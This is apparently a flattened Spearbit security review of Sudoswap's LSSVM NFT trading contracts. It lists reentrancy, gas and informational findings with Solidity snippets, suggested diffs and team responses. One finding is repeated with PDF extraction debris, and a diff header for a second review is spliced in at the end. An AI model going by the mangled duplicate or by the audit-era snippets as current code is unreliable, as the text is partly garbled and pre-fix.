Description: The ETH-based swap functions use isRouter == false and routerCaller == address(0) as parameters to swapTokenForAnyNFTs() and swapTokenForSpecificNFTs(). These parameters end up in _validateTokenInput(). The LSSVMPairETH version of this function does not use those parameters, so it is not a problem at this point. However, the call actually originates from the Router, so functionally isRouter should be true. Our concern is that using inside knowledge of the functions might potentially introduce subtle issues in the following scenarios:

    function robustSwapETHForAnyNFTs(...) ... {
        ...
        remainingValue -= swapList[i].pair.swapTokenForAnyNFTs{value: pairCost}(swapList[i].numItems, nftRecipient, false, address(0));
        ...
    }

    function robustSwapETHForSpecificNFTs(...) ... {
        ...
        remainingValue -= swapList[i].pair.swapTokenForSpecificNFTs{value: pairCost}(swapList[i].nftIds, nftRecipient, false, address(0));
        ...
    }

    function _swapETHForAnyNFTs(...) ... {
        ...
        remainingValue -= swapList[i].pair.swapTokenForAnyNFTs{value: pairCost}(swapList[i].numItems, nftRecipient, false, address(0));
        ...
    }

    function _swapETHForSpecificNFTs(...) ... {
        ...
        remainingValue -= swapList[i].pair.swapTokenForSpecificNFTs{value: pairCost}(swapList[i].nftIds, nftRecipient, false, address(0));
        ...
    }

    function swapTokenForAnyNFTs(..., bool isRouter, address routerCaller) ... {
        ...
        _validateTokenInput(inputAmount, isRouter, routerCaller, _factory);
        ...
    }

    function swapTokenForSpecificNFTs(..., bool isRouter, address routerCaller) ... {
        ...
        _validateTokenInput(inputAmount, isRouter, routerCaller, _factory);
        ...
    }

    abstract contract LSSVMPairETH is LSSVMPair {
        function _validateTokenInput(..., bool /*isRouter*/, address /*routerCaller*/, ...) {
            // doesn't use isRouter and routerCaller
        }
    }

Recommendation: Spearbit recommends Sudoswap to consider making the changes listed below in the following functions: _swapETHForSpecificNFTs, robustSwapETHForAnyNFTs, robustSwapETHForSpecificNFTs, and _swapETHForAnyNFTs:

    - remainingValue -= swapList[i].pair.swapTokenForSpecificNFTs{value: pairCost}(swapList[i].nftIds, nftRecipient, false, address(0));
    + remainingValue -= swapList[i].pair.swapTokenForSpecificNFTs{value: pairCost}(swapList[i].nftIds, nftRecipient, true, msg.sender);

    - remainingValue -= swapList[i].pair.swapTokenForAnyNFTs{value: pairCost}(swapList[i].numItems, nftRecipient, false, address(0));
    + remainingValue -= swapList[i].pair.swapTokenForAnyNFTs{value: pairCost}(swapList[i].numItems, nftRecipient, true, msg.sender);

Sudoswap: Addressed in this branch here.

Spearbit: Acknowledged.

+3.4.9 Add Reentrancy Guards Severity: Low Risk Context: All LSSVM Contracts. Specifically, three categories of functions:

1. Functions withdrawing ETH
2. Functions sending ETH
3. Functions that use safeTransferFrom() to call external addresses

Instances of functions withdrawing ETH: LSSVMPairFactory.sol#L272, LSSVMPairETH.sol#L104

Instances of functions sending ETH: LSSVMPairETH.sol#L34, LSSVMPairETH.sol#L46, LSSVMPairETH.sol#L79, LSSVMRouter.sol#L376, LSSVMRouter.sol#L423, LSSVMRouter.sol#L640, LSSVMRouter.sol#L677

Uses of safeTransferFrom() to external addresses: LSSVMRouter.sol#L544, LSSVMRouter.sol#L593, LSSVMPairFactory.sol#L773, LSSVMPairEnumerable.sol#L33, LSSVMPairEnumerable.sol#L52, LSSVMPairEnumerable.sol#L73, LSSVMPairEnumerable.sol#L114, LSSVMPairMissingEnumerable.sol#L37, LSSVMPairMissingEnumerable.sol#L58, LSSVMPairMissingEnumerable.sol#L82, LSSVMPairMissingEnumerable.sol#L133, LSSVMPairMissingEnumerable.sol#L143

Description: The abovementioned permalinks and corresponding functions are listed for Sudoswap's consideration to introduce reentrancy guard modifiers. Currently, there is only one function that uses a reentrancy guard modifier: withdrawAllETH() in LSSVMPairETH.sol#L94. Other functions in the codebase may also require reentrancy guard modifiers. We have only seen reentrancy problems when malicious routers, assetRecipients, curves, the factory owner or the protocolFeeRecipient are involved. Despite normal prohibitions on this occurrence, it is better to protect one's codebase than to regret leaving vulnerabilities open to potential attackers. There are three categories of functions that Sudoswap should consider applying reentrancy guard modifiers to: functions withdrawing ETH, functions sending ETH, and uses of safeTransferFrom() to external addresses (which will trigger an onERC1155Received() callback to receiving contracts).

Examples of functions withdrawing ETH within LSSVM: LSSVMPairFactory.sol#L272, LSSVMPairETH.sol#L104

Instances of functions sending ETH within LSSVM: LSSVMPairETH.sol#L34, LSSVMPairETH.sol#L46

A couple of instances that use safeTransferFrom() to call external addresses, which will trigger an onERC1155Received() callback to receiving contracts: LSSVMPairFactory.sol#L428, LSSVMRouter.sol#L544

Recommendation: Spearbit recommends Sudoswap to consider adding reentrancy guards to the abovementioned functions and to the entire codebase where appropriate.
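For illustration, a minimal sketch of the guard pattern, as already used by withdrawAllETH() in LSSVMPairETH.sol (the function body here is illustrative, not the actual implementation):

    // The nonReentrant modifier, from the ReentrancyGuard that LSSVMPair
    // already inherits, blocks re-entry for the duration of the call, so a
    // receive() hook on the recipient cannot re-enter this or other guarded
    // functions while the external ETH send is in flight
    function withdrawAllETH() external onlyOwner nonReentrant {
        uint256 amount = address(this).balance;
        payable(msg.sender).safeTransferETH(amount);
    }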
Sudoswap: We've addressed the specific issues linked above with regards to reentrancy. The checks in _pairTransferERC20From and _takeNFTsFromSender both verify token balance or ownership before and after each transfer, which can help ensure that tokens are actually sent to the Pair (or its asset recipient). However, we acknowledge this does not mitigate the entire space of possible issues with future malicious Routers. The gas overhead for adding ReentrancyGuard can be quite significant when e.g. swapping across multiple pools in one tx, so we have opted to avoid it if possible. Pair owners will need to be aware of which new Routers become approved by the Factory owner (intended to be set to a governance-controlled timelock during deployment).

Spearbit: Acknowledged.

3.5 Gas Optimization

+3.5.1 Saving 1 byte off the constructor() code Severity: Gas Optimization Context: LSSVMPairCloner#L21-45, LSSVMPairCloner#L113-147

Description: The dup2 before the return in the code below indicates a possible optimization by rearranging the stack.

    function cloneETHPair(...) ... {
        assembly {
            ...
            // 3d          | RETURNDATASIZE     | 0          | -
            // 60 runtime  | PUSH1 runtime (r)  | r 0        | -
            // 80          | DUP1               | r r 0      | -
            // 60 creation | PUSH1 creation (c) | c r r 0    | -
            // 3d          | RETURNDATASIZE     | 0 c r r 0  | -
            // 39          | CODECOPY           | r 0        | [0-2d]: runtime code
            // 81          | DUP2               | 0 r 0      | [0-2d]: runtime code
            // f3          | RETURN             | 0          | [0-2d]: runtime code
            ...
        }
    }

Recommendation: Spearbit recommends Sudoswap to consider replacing the constructor code in cloneETHPair() and cloneERC20Pair() with the following code. Also, Sudoswap should make sure to update any dependencies on the length.

    // 60 runtime  | PUSH1 runtime (r)  | r
    // 3d          | RETURNDATASIZE     | 0 r
    // 81          | DUP2               | r 0 r
    // 60 creation | PUSH1 creation (c) | c r 0 r
    // 3d          | RETURNDATASIZE     | 0 c r 0 r
    // 39          | CODECOPY           | 0 r
    // f3          | RETURN             |

Sudoswap: Addressed in this branch here.

Spearbit: Acknowledged. Please double-check with the changes for the finding "Clones With Malicious extradata Are Also Considered Valid Clones", especially the amount of bytes checked at the end of isETHPairClone() and isERC20PairClone().

+3.5.2 Decode extradata in calldata in one go Severity: Gas Optimization Context: LSSVMPair.sol#L131-133

Description: Spearbit discovered that the functions factory(), bondingCurve() and nft() are called independently, but in most use cases all of the data is required.

Recommendation: Spearbit recommends Sudoswap to create a function that decodes the data in one go to save some gas. We recommend creating a new function that calls calldatasize and _immutableParamsLength only once to decode all parameters. This function will also save jump operations.

Sudoswap: Acknowledged, but no change for now. A previous implementation decoding all parameters at once had inconclusive gas savings during gas profiling.

Spearbit: Acknowledged.

+3.5.3 Transfer last NFT instead of first Severity: Gas Optimization Context: LSSVMPairEnumerable.sol#L23-35, LSSVMPairMissingEnumerable#L28-40, OpenZeppelin's ERC721Enumerable, OpenZeppelin's EnumerableSet.sol

Description: When executing _sendAnyNFTsToRecipient(), NFTs are retrieved by taking the first available NFT and sending it to nftRecipient. In (most) ERC721 implementations, as well as in the EnumerableSet implementation, the array that stores the ownership is updated by swapping the last element with the selected element, to be able to shrink the array afterwards. When you always transfer the last NFT instead of the first, this swapping isn't necessary, so gas is saved.

Code related to LSSVMPairEnumerable.sol:

    abstract contract LSSVMPairEnumerable is LSSVMPair {
        function _sendAnyNFTsToRecipient(IERC721 _nft, address nftRecipient, uint256 numNFTs) internal override {
            ...
            for (uint256 i = 0; i < numNFTs; i++) {
                // take the first NFT
                uint256 nftId = IERC721Enumerable(address(_nft)).tokenOfOwnerByIndex(address(this), 0);
                // this calls _beforeTokenTransfer of ERC721Enumerable
                _nft.safeTransferFrom(address(this), nftRecipient, nftId);
            }
        }
    }

    abstract contract ERC721Enumerable is ERC721, IERC721Enumerable {
        function _beforeTokenTransfer(address from, address to, uint256 tokenId) internal virtual override {
            ...
            _removeTokenFromOwnerEnumeration(from, tokenId);
            ...
        }

        function _removeTokenFromOwnerEnumeration(address from, uint256 tokenId) private {
            ...
            uint256 lastTokenIndex = ERC721.balanceOf(from) - 1;
            uint256 tokenIndex = _ownedTokensIndex[tokenId];
            // When the token to delete is the last token, the swap operation
            // is unnecessary ==> we can make use of this
            if (tokenIndex != lastTokenIndex) {
                uint256 lastTokenId = _ownedTokens[from][lastTokenIndex];
                _ownedTokens[from][tokenIndex] = lastTokenId; // Move the last token to the slot of the to-delete token
                _ownedTokensIndex[lastTokenId] = tokenIndex;  // Update the moved token's index
            }
            // This also deletes the contents at the last position of the array
            delete _ownedTokensIndex[tokenId];
            delete _ownedTokens[from][lastTokenIndex];
        }
    }

Code related to LSSVMPairMissingEnumerable.sol:

    abstract contract LSSVMPairMissingEnumerable is LSSVMPair {
        function _sendAnyNFTsToRecipient(IERC721 _nft, address nftRecipient, uint256 numNFTs) internal override {
            ...
            for (uint256 i = 0; i < numNFTs; i++) {
                uint256 nftId = idSet.at(0); // take the first NFT
                _nft.safeTransferFrom(address(this), nftRecipient, nftId);
                idSet.remove(nftId); // finally calls _remove()
            }
        }
    }

    library EnumerableSet {
        function _remove(Set storage set, bytes32 value) private returns (bool) {
            ...
            uint256 toDeleteIndex = valueIndex - 1;
            uint256 lastIndex = set._values.length - 1;
            if (lastIndex != toDeleteIndex) { // ==> we can make use of this
                bytes32 lastvalue = set._values[lastIndex];
                set._values[toDeleteIndex] = lastvalue; // Move the last value to the index where the value to delete is
                set._indexes[lastvalue] = valueIndex;   // Replace lastvalue's index to valueIndex
            }
            set._values.pop();          // Delete the slot where the moved value was stored
            delete set._indexes[value]; // Delete the index for the deleted slot
            ...
        }
    }

Recommendation: Spearbit recommends Sudoswap to consider changing the _sendAnyNFTsToRecipient() function as follows. Note: Do consider whether this is worth the trouble, taking into account the expected average number of NFTs that are exchanged. Note also that the dynamics of distributing NFTs change once you implement this; the mechanism changes from FIFO (first in, first out) to LIFO (last in, first out).

For LSSVMPairEnumerable.sol:

      function _sendAnyNFTsToRecipient(IERC721 _nft, address nftRecipient, uint256 numNFTs) internal override {
          ...
    +     uint256 lastTokenIndex = _nft.balanceOf(address(this)) - 1;
          for (uint256 i = 0; i < numNFTs; i++) {
    -         uint256 nftId = IERC721Enumerable(address(_nft)).tokenOfOwnerByIndex(address(this), 0); // take the first NFT
    +         uint256 nftId = IERC721Enumerable(address(_nft)).tokenOfOwnerByIndex(address(this), lastTokenIndex--); // take the last NFT
              _nft.safeTransferFrom(address(this), nftRecipient, nftId);
          }
      }

For LSSVMPairMissingEnumerable.sol:

      function _sendAnyNFTsToRecipient(IERC721 _nft, address nftRecipient, uint256 numNFTs) internal override {
          ...
    +     uint256 lastIndex = idSet.length() - 1;
          for (uint256 i = 0; i < numNFTs; i++) {
    -         uint256 nftId = idSet.at(0); // take the first NFT
    +         uint256 nftId = idSet.at(lastIndex--); // take the last NFT
              _nft.safeTransferFrom(address(this), nftRecipient, nftId);
              idSet.remove(nftId);
          }
      }

Sudoswap: Partially addressed in this branch here. We tried both recommendations for both the Enumerable and MissingEnumerable Pairs. The gas snapshot for our test bench showed gas reductions when transferring the last NFT out first in the MissingEnumerable implementation, so we have followed the recommendation. However, the gas savings in the Enumerable case were inconclusive, so we have not followed the second recommendation.
Spearbit: Acknowledged.

+3.5.4 Simplify the connection between Pair and Router Severity: Gas Optimization Context: LSSVMPairERC20.sol#L41-78, LSSVMRouter.sol#L574-594, LSSVMRouter.sol#L754-789, LSSVMPair.sol#L371-379

Description: There are two ways to interact between Pair and Router:

1. LSSVMPairERC20.sol calls router.pairTransferERC20From, where the goal is to transfer ERC20 tokens.
2. _swapNFTsForToken calls pair.cacheAssetRecipientNFTBalance and pair.routerSwapNFTsForToken, where the goal is to transfer NFTs.

Using two different patterns to solve the same problem makes the code more complex and larger than necessary. Patterns with cacheAssetRecipientNFTBalance() are also error prone.

    abstract contract LSSVMPairERC20 is LSSVMPair {
        function _validateTokenInput(..., bool isRouter, ...) ... {
            ...
            if (isRouter) {
                // Verify if router is allowed
                LSSVMRouter router = LSSVMRouter(payable(msg.sender));
                require(_factory.routerAllowed(router), "Not router");
                ...
                router.pairTransferERC20From(
                    _token,
                    routerCaller,
                    _assetRecipient,
                    inputAmount,
                    pairVariant()
                );
                ...
            }
            ...
        }
    }

    contract LSSVMRouter {
        function pairTransferERC20From(...) ... {
            // verify caller is a trusted pair contract
            require(factory.isPair(msg.sender, variant), "Not pair");
            ...
            // transfer tokens to pair (transfer ERC20 from the original caller)
            token.safeTransferFrom(from, to, amount);
        }
    }

    contract LSSVMRouter {
        function _swapNFTsForToken(...) ... {
            ...
            // Cache current asset recipient balance
            swapList[i].pair.cacheAssetRecipientNFTBalance();
            ...
            for (uint256 j = 0; j < swapList[i].nftIds.length; j++) {
                // transfer NFTs from the original caller
                nft.safeTransferFrom(msg.sender, assetRecipient, swapList[i].nftIds[j]);
            }
            ...
            outputAmount += swapList[i].pair.routerSwapNFTsForToken(tokenRecipient);
            ...
        }
    }

    abstract contract LSSVMPair is Ownable, ReentrancyGuard {
        function cacheAssetRecipientNFTBalance() external {
            // Verify if router is allowed
            require(factory().routerAllowed(LSSVMRouter(payable(msg.sender))), "Not router");
            assetRecipientNFTBalanceAtTransferStart = nft().balanceOf(getAssetRecipient()) + 2;
        }
    }

Recommendation: Spearbit recommends Sudoswap to let _swapNFTsForToken use the same pattern as LSSVMPairERC20.sol, so that cacheAssetRecipientNFTBalance() will no longer be necessary. In addition, the functions routerSwapNFTsForToken() and swapNFTsForToken() can be merged, simplifying the code.

Sudoswap: Addressed in this branch here. Balances are no longer cached and then used in a separate routerSwap function. Instead, we use the same pattern as ERC20 tokens, with the router pulling from the user, with the same check that it can only come from LSSVMPair. LSSVMPair now checks NFT ownership before and after each transfer to guard against potentially malicious routers.

Spearbit: Acknowledged.

+3.5.5 Cache array length Severity: Gas Optimization Context: LSSVM Contracts: LSSVMPairEnumerable.sol, LSSVMPairFactory.sol, LSSVMPairMissingEnumerable.sol, LSSVMRouter.sol. Specifically, the following lines in the corresponding contracts:

LSSVMPairEnumerable.sol: LSSVMPairEnumerable.sol#L51, LSSVMPairEnumerable.sol#L72, LSSVMPairEnumerable.sol#L113

LSSVMPairFactory.sol: LSSVMPairFactory.sol#L378, LSSVMPairFactory.sol#L409, LSSVMPairFactory.sol#L427

LSSVMPairMissingEnumerable.sol: LSSVMPairMissingEnumerable.sol#L57, LSSVMPairMissingEnumerable.sol#L81, LSSVMPairMissingEnumerable.sol#L132, LSSVMPairMissingEnumerable.sol#L142

LSSVMRouter.sol: LSSVMRouter.sol#L358, LSSVMRouter.sol#L405, LSSVMRouter.sol#L448, LSSVMRouter.sol#L491, LSSVMRouter.sol#L524, LSSVMRouter.sol#L543, LSSVMRouter.sol#L625, LSSVMRouter.sol#L662, LSSVMRouter.sol#L700, LSSVMRouter.sol#L772

Description: An array length is frequently used in for loops. This value is re-evaluated on every iteration of the loop. Assuming the arrays are regularly larger than 1, it saves some gas to store the array length in a temporary variable. The following snippets are samples of the above context for lines of code where this is relevant: LSSVMPairEnumerable.sol#L51, LSSVMPairFactory.sol#L378, LSSVMPairMissingEnumerable.sol#L57, LSSVMRouter.sol#L358. For more examples, please see the context above for the exact lines where this applies. The following contains an example of the overuse of nftIds.length:

    function swapTokenForSpecificNFTs(...) ... {
        ...
        require((nftIds.length > 0) && (nftIds.length <= _nft.balanceOf(address(this))), "Must ask for > 0 and < balanceOf NFTs");
        ...
        (error, newSpotPrice, inputAmount, protocolFee) = _bondingCurve.getBuyInfo(
            spotPrice,
            delta,
            nftIds.length,
            fee,
            _factory.protocolFeeMultiplier()
        );
        ...
    }

Recommendation: Spearbit recommends Sudoswap to store array lengths in a temporary variable, especially with for loops.
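For illustration, a minimal sketch of the caching pattern (the loop body is illustrative):

    uint256 numIds = nftIds.length; // read the length once
    for (uint256 i = 0; i < numIds; i++) {
        _nft.safeTransferFrom(msg.sender, _assetRecipient, nftIds[i]);
    }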
+3.5.5 Cache array length Severity: Gas Optimization Context: LSSVM Contracts, LSSVMPairEnumerable.sol, LSSVMPairFactory.sol, 34 LSSVMPairMissingEnumerable.sol, LSSVMRouter.sol Specifically, the following lines in the corresponding contracts: LLSVMPairEnumerable.sol: LSSVMPairEnumerable.sol#L51, LSSVMPairEnumera ble.sol#L72, LSSVMPairEnumerable.sol#L113 LSSVMPairFactory.sol: LSSVMPairFactory.sol#L378, LSSVMPairFactory.sol #L409, LSSVMPairFactory.sol#L427 LSSVMPairMissingEnumerable.sol: LSSVMPairMissingEnumerable.sol#L57, LS SVMPairMissingEnumerable.sol#L81, LSSVMPairMissingEnumerable.sol#L132, LSSVMPairMissingEnumerable.sol#L142 LSSVMRouter.sol: LSSVMRouter.sol#L358, LSSVMRouter.sol#L405, LSSVMRoute r.sol#L448, LSSVMRouter.sol#L491, LSSVMRouter.sol#L524, LSSVMRouter.so l#L543, LSSVMRouter.sol#L625, LSSVMRouter.sol#L662, LSSVMRouter.sol#L7 00, LSSVMRouter.sol#L772 Description: An array length is frequently used in for loops. This value is an evaluation for every iteration of the loop. Assuming the arrays are regularly larger than 1, it saves some gas to store the array length in a temporary variable. The following snippets are samples of the above context for lines of code where this is relevant: LSSVMPairEnumerable.sol#L51 LSSVMPairFactory.sol#L378 LSSVMPairMissingEnumerable.sol#L57 LSSVMRouter.sol#L358 For more examples, please see the context above for exact lines where this applies. The following contains examples of the overusage of nftIds.length: 35 function swapTokenForSpecificNFTs(...) ... { ... require((nftIds.length > 0) && (nftIds.length <= _nft.balanceOf(address(this))),"Must ask for > 0 and < balanceOf NFTs"); ... (error, newSpotPrice, inputAmount, protocolFee) = _bondingCurve ,! .getBuyInfo( spotPrice, delta, nftIds.length, fee, _factory.protocolFeeMultiplier() ); ... } Recommendation: Spearbit recommends Sudoswap to store array lengths in a temporary variable, especially with for loops. Sudoswap: Acknowledged, but no change for now. Spearbit: Acknowledged. +3.5.6 Use Custom Errors Severity: Gas Optimization Context: LSSVM\Contracts, specifically the following contracts: LSSVMPair.sol, LSSVMPairERC20.sol, LSSVMPairETH.sol, LSSVMPairFactory.sol LSSVMRouter. sol. Specific locations within each contract: LSSVMPair.sol: LSSVMPair.sol#L79, LSSVMPair.sol#L86, LSSVMPair.sol#L91, LSSVMPair.sol#L92-95, LSSVMPair.sol#L99, LSSVMPair.sol#L100-103, LSSVMP air.sol#L138-141, LSSVMPair.sol#L142-145, LSSVMPair.sol#L161, LSSVMPai r.sol#L205-208, LSSVMPair.sol#L209-213, LSSVMPair.sol#L229, LSSVMPair. sol#L271-274, LSSVMPair.sol#L290, LSSVMPair.sol#L298-301, LSSVMPair.so l#L354, LSSVMPair.sol#L372-375, LSSVMPair.sol#L632-635, LSSVMPair.sol# L646-649, LSSVMPair.sol#L662, LSSVMPair.sol#L663, LSSVMPair.sol#L677, LS SVMPair.sol#L692, LSSVMPair.sol#L694 LSSVMPairERC20.sol: LSSVMPairERC20.sol#L47, LSSVMPairERC20.sol#L55, LS SVMPairERC20.sol#L69-73 36 LSSVMPairETH.sol: LSSVMPairETH.sol#L29 LSSVMPairFactory.sol: LSSVMPairFactory.sol#L51-54, LSSVMPairFactory.s ol#L57-60, LSSVMPairFactory.sol#L63-66, LSSVMPairFactory.sol#L69-72, LS SVMPairFactory.sol#L75, LSSVMPairFactory.sol#L78, LSSVMPairFactory.sol #L111-114, LSSVMPairFactory.sol#L179-182, LSSVMPairFactory.sol#L295, LS SVMPairFactory.sol#L307, LSSVMPairFactory.sol#L335, LSSVMPairFactory.s ol#L350, LSSVMPairFactory.sol#L353 LSSVMRouter.sol: LSSVMRouter.sol#L582, LSSVMRouter.sol#L585-590, LSSVMR outer.sol#L604, LSSVMRouter.sol#L788 Description: Strings are used to encode error messages. 
Sudoswap: Acknowledged, but no change for now. Because Pairs are minimal proxies, the gas savings from not having to deploy strings are less of a consideration, as the implementation is only deployed once.

Spearbit: Acknowledged.

+3.5.7 Alternatives for the immutable Proxy variables Severity: Gas Optimization Context: LSSVMPairCloner.sol#L113-137

Description: In the current LSSVMPairCloner, the immutable variables stored in the proxy are sent along with every call. It may be possible to optimize this.

Recommendation: Spearbit recommends Sudoswap two different approaches to this optimization. The first is that Sudoswap store the extra data in the contract code, accessing the extra data by using extcodecopy in the Pair contracts. It simplifies the proxy code a little, and arguably the Pair code as well. Spearbit completed a potential implementation of this recommendation as follows.

Source snippet for proxy creation:

    bytes memory ptr = abi.encodePacked(..., implementation, ..., factory, bondingCurve, nft, poolType, token);
    assembly {
        instance := create(0, ptr, ...)
        ...
    }

Source snippet to retrieve (immutable) values from the proxy code:

    function getFactory() internal view returns (address factory) {
        assembly {
            // Copies to "scratch space" (memory pointer 0)
            extcodecopy(address(), 0, 0x28, 0x14)
            factory := shr(0x60, mload(0))
        }
    }

If this is not preferable for Sudoswap, our second recommendation is to improve the readability of the code by using Solidity only. However, this approach will cost some more gas. To implement this alternative, follow these steps:

1. Store the extra data as an immutable variable in the proxy.
2. Create a getter function extraData(). Because the address will always be hot when being called by the Pair, the call should cost only about 150 gas.
3. The proxy code can then be almost entirely in Solidity and the Pair will not require the use of any low-level calls.

Sudoswap: Acknowledged, but no changes at this time. We previously used the extcodecopy method, and the current method of accessing the immutable variables appears to be cheaper gas-wise.

Spearbit: Acknowledged.

3.6 Informational

+3.6.1 Pair implementations may not be Proxies Severity: Informational Context: LSSVMRouter.sol#L574-594, LSSVMPairFactory.sol#L223-257, LSSVMPairCloner.sol#L206-267

Description: The security of the function pairTransferERC20From() relies on isPair(). In turn, isPair() relies on both isETHPairClone() and isERC20PairClone(). These functions check that a valid proxy is used with a valid implementation address. However, if the implementation address itself is a proxy, it could link to any other contract. In this case security could be undermined, depending on the implementation details. This is not how the protocol is designed, but future developers or developers using a fork of the code might not be aware of this.

Recommendation: Spearbit recommends Sudoswap to make sure no proxies are used for the Pair implementation.
This is a control that should be present in the deployment process (i.e., outside of Solidity).

Sudoswap: Acknowledged, no external-facing changes made. As mentioned above, our protocol does not use proxies for the implementation, so no action is taken at this time.

Spearbit: Acknowledged.

+3.6.2 NFT and Token Pools can be signed orders instead Severity: Informational Context: LSSVMPair.sol

Description: Currently, if any actor wants to create a buy/sell order they have to create a new pool and pay gas for it. However, the advantage of this is unclear. TOKEN and NFT type pools can really be buy/sell orders at a price curve using signed data. This is reminiscent of how similar limit orders implemented by OpenSea, 1inch, and SushiSwap currently function. Amending this in the codebase would make creating buy/sell orders free and should attract more liquidity and/or orders to Sudoswap.

Recommendation: Spearbit recommends Sudoswap to consider the addition of a single OrderBook contract that only the taker has to call, providing the maker's signed order to fulfill an order.

Sudoswap: Acknowledged. The signature-based model is well served by e.g. 0x Protocol, Wyvern, and others with off-chain matching and on-chain settlement. The intent behind having on-chain pools is precisely the benefits of being on-chain: easier management by DAOs and other smart contract actors (which would need to make a transaction anyway to work with a signature-based order book), allowing projects to lock in buy-side liquidity in a trustless manner (similar to how LP positions for normal AMM pools can be locked), and a decentralized order book by design: anyone can query pools and build front-ends for swapping without relying on a centralized off-chain API. Also to note: separately from this AMM protocol, Sudoswap already has an off-chain order book leveraging 0x Protocol v2 for limit buys/sells.

Spearbit: Acknowledged.

+3.6.3 Remove Code Duplication Severity: Informational Context: LSSVMPair.sol#L125, LSSVMPair.sol#L192

Description: Functions like swapTokenForAnyNFTs and swapTokenForSpecificNFTs are nearly identical and can be deduplicated by creating a common internal function. On the other hand, this will slightly increase gas usage due to an extra jump.

Recommendation: Spearbit recommends Sudoswap to consider the trade-off between code hygiene and minute gas savings. Our opinion is that the minor gas savings are not worth it in this case and the code should be deduplicated.

Sudoswap: Acknowledged, but no change at this time.

Spearbit: Acknowledged.

+3.6.4 Unclear Function Name Severity: Informational Context: LSSVMPairETH.sol#L23-36, LSSVMPairERC20.sol#L41-78

Description: The functions _validateTokenInput() of both LSSVMPairETH and LSSVMPairERC20 do not only validate the token input but also transfer ETH/ERC20. The function name does not reasonably imply this and can therefore create some confusion.

    abstract contract LSSVMPairETH is LSSVMPair {
        function _validateTokenInput(...) ... {
            ...
            _assetRecipient.safeTransferETH(inputAmount);
            ...
        }
    }

    abstract contract LSSVMPairERC20 is LSSVMPair {
        function _validateTokenInput(...) ... {
            ...
            if (isRouter) {
                ...
                router.pairTransferERC20From(...); // transfer of tokens
                ...
            } else {
                // Transfer tokens directly
                _token.safeTransferFrom(msg.sender, _assetRecipient, inputAmount);
            }
        }
    }

Recommendation: Spearbit recommends Sudoswap to consider renaming the function _validateTokenInput() to _validateAndTransferTokenInput().

Sudoswap: Changed in response to this issue.
_validateTokenInput() is now called _pullTokenInputAndPayProtocolFee.

Spearbit: Acknowledged.

+3.6.5 Inaccurate Message About MAX_FEE Severity: Informational Context: LSSVMPair.sol

Description: The function initialize() of LSSVMPair has an error message containing "less than 100%". This is likely an error and should probably be "less than 90%", as in the changeFee() function and because MAX_FEE == 90%.

    // 90%, must be <= 1 - MAX_PROTOCOL_FEE (set in LSSVMPairFactory)
    uint256 internal constant MAX_FEE = 9e17;

    function initialize(..., uint256 _fee, ...) external payable {
        ...
        require(_fee < MAX_FEE, "Trade fee must be less than 100%"); // 100% should be 90%
        ...
    }

    function changeFee(uint256 newFee) external onlyOwner {
        ...
        require(newFee < MAX_FEE, "Trade fee must be less than 90%");
        ...
    }

Recommendation: Spearbit recommends Sudoswap to change the 100% to 90%.

Sudoswap: Addressed in branch here.

Spearbit: Acknowledged.

+3.6.6 Inaccurate comment for assetRecipientNFTBalanceAtTransferStart Severity: Informational Context: LSSVMPair.sol#L27-29, LSSVMPair.sol#L318-337

Description: The comment in LSSVMPair notes that assetRecipientNFTBalanceAtTransferStart is 0; however, in routerSwapNFTsForToken() the variable assetRecipientNFTBalanceAtTransferStart is set to 1. As such, the below comment is probably inaccurate.

    // Temporarily used during LSSVMRouter::_swapNFTsForToken to store the number of NFTs transferred
    // directly to the pair. Should be 0 outside of the execution of routerSwapAnyNFTsForToken.
    uint256 internal assetRecipientNFTBalanceAtTransferStart;

    function routerSwapNFTsForToken(address payable tokenRecipient) ... {
        ...
        assetRecipientNFTBalanceAtTransferStart = 1;
        ...
    }

Recommendation: Spearbit recommends Sudoswap to re-evaluate the accuracy of this comment.

Sudoswap: The comment is indeed incorrect. Addressed in the change to the GitHub Issue here (we no longer use the cache flow).

Spearbit: Acknowledged.

+3.6.7 IERC1155 not utilized Severity: Informational Context: LSSVMPair.sol#L5, LSSVMRouter.sol#L35-38

Description: The contract LSSVMPair references IERC1155 but does not utilize the interface within LSSVMPair.sol.

    import {IERC1155} from "@openzeppelin/contracts/token/ERC1155/IERC1155.sol";

The struct TokenToTokenTrade is defined in LSSVMRouter, but the contract does not use it either.

    struct TokenToTokenTrade {
        PairSwapSpecific[] tokenToNFTTrades;
        PairSwapSpecific[] nftToTokenTrades;
    }

It is better to remove unused code due to potential confusion.

Recommendation: Spearbit recommends Sudoswap to remove the import of IERC1155 from LSSVMPair.sol and remove the struct TokenToTokenTrade from LSSVMRouter.sol.

Sudoswap: Addressed in branch here. Unused import and struct are removed.

Spearbit: Acknowledged.

+3.6.8 Use Fractions Severity: Informational Context: LSSVMPairFactory.sol#L28, LSSVMPair.sol#L25

Description: In some occasions percentages are indicated in a number format ending in e17. It is also possible to use fractions of e18. Considering e18 is the standard base format, using fractions might be easier to read.
LSSVMPairFactory.sol#L28, LSSVMPair.sol#L25

Recommendation: Spearbit recommends Sudoswap to update LSSVMPairFactory.sol#L28 for better readability with fractions:

    - uint256 internal constant MAX_PROTOCOL_FEE = 1e17;
    + uint256 internal constant MAX_PROTOCOL_FEE = 0.10e18; // 10%

In addition, Sudoswap should update LSSVMPair.sol#L25 for better readability with fractions, according to the diff below:

    - uint256 internal constant MAX_FEE = 9e17;
    + uint256 internal constant MAX_FEE = 0.90e18; // 90%

Sudoswap: Addressed in branch here.

Spearbit: Acknowledged.

+3.6.9 Two families of token libraries used Severity: Informational Context: LSSVMPairFactory.sol#L4-10

Description: The Sudoswap contracts import token libraries from both OpenZeppelin and Solmate. If Sudoswap sticks with one library family, it will not be necessary to track potential issues from two separate families of libraries.

Recommendation: Spearbit recommends Sudoswap to consider choosing either the Solmate or the OpenZeppelin family of libraries. If there is a specific reason to use multiple libraries, add a comment in the contracts explaining why multiple libraries are used.

Sudoswap: We use the Solmate library for easier integration with their SafeTransferLib, which saves on some gas. A dev comment explaining this has been added in this commit here.

Spearbit: Acknowledged.

diff --git a/findings_newupdate/spearbit/SudoswapLSSVM2-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/SudoswapLSSVM2-Spearbit-Security-Review.txt new file mode 100644 index 0000000..199063c --- /dev/null +++ b/findings_newupdate/spearbit/SudoswapLSSVM2-Spearbit-Security-Review.txt @@ -0,0 +1,114 @@
+5.1.1 Partial fills for buy orders in ERC1155 swaps will fail when pair has insufficient balance Severity: High Risk Context: VeryFastRouter.sol#L189-L198

